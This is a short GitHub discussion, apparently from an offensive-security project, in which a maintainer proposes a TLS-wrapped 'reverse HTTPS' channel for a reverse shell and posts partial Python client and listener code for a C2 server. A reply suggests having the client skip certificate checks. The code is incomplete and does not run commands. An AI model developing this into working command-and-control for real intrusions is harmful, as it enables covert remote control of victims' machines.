Skip to content

Navigation Menu

Sign in
Appearance settings

Search code, repositories, users, issues, pull requests...

Provide feedback

We read every piece of feedback, and take your input very seriously.

Saved searches

Use saved searches to filter your results more quickly
Appearance settings
Discussion options

safesploit
Jul 5, 2023
Maintainer

Instead of relying on a Socket bind for a reverse shell. A reverse HTTPS connection can be used instead.

client.py

import socket
import ssl

def reverse_https_connect(ip, port):
    context = ssl.create_default_context(ssl.Purpose.SERVER_AUTH)
    context.verify_mode = ssl.CERT_REQUIRED
    context.load_verify_locations("path/to/server_certificate.pem")  # Specify the path to the server certificate

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s = context.wrap_socket(s, server_hostname=ip)

    try:
        s.connect((ip, port))
        print(f"Connected to {ip}:{port} using reverse HTTPS")

        while True:
            command = input("Enter a command: ")
            s.sendall(command.encode())

            if command.lower() == "quit":
                break

            data = s.recv(4096)
            print(data.decode())

    except Exception as e:
        print(f"An error occurred during the reverse HTTPS connection: {str(e)}")

    s.close()

server.py

Initiating the HTTPS server listener

    httpd = http.server.HTTPServer(server_address, HTTPSRequestHandler)
    httpd.socket = ssl.wrap_socket(httpd.socket, certfile="cert.pem", keyfile="key.pem", server_side=True)

HTTPS Class

class HTTPSRequestHandler(http.server.SimpleHTTPRequestHandler):
    def _send_cors_headers(self):
        self.send_response(200)
        self.send_header('Access-Control-Allow-Origin', '*')
        self.send_header('Access-Control-Allow-Methods', 'GET, POST, OPTIONS')
        self.send_header('Access-Control-Allow-Headers', 'X-Requested-With')
        self.send_header('Content-Type', 'text/html')
        self.end_headers()

    def do_OPTIONS(self):
        self._send_cors_headers()

    def do_GET(self):
        self._send_cors_headers()
        self.wfile.write(bytes('HTTP/1.1 200 OK\n', 'utf-8'))
        self.wfile.write(bytes('\n', 'utf-8'))
        self.wfile.write(bytes('C2 Server is running!', 'utf-8'))
You must be logged in to vote

Replies: 1 comment

Comment options

fish-not-phish
Jul 12, 2023

Have you looked into the client not needing a cert? Ignoring all cert issues and continue with establishing HTTPS connection. Might be worth exploring.
You must be logged in to vote
0 replies
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
2 participants
@safesploit @fish-not-phish
Morty Proxy This is a proxified and sanitized view of the page, visit original site.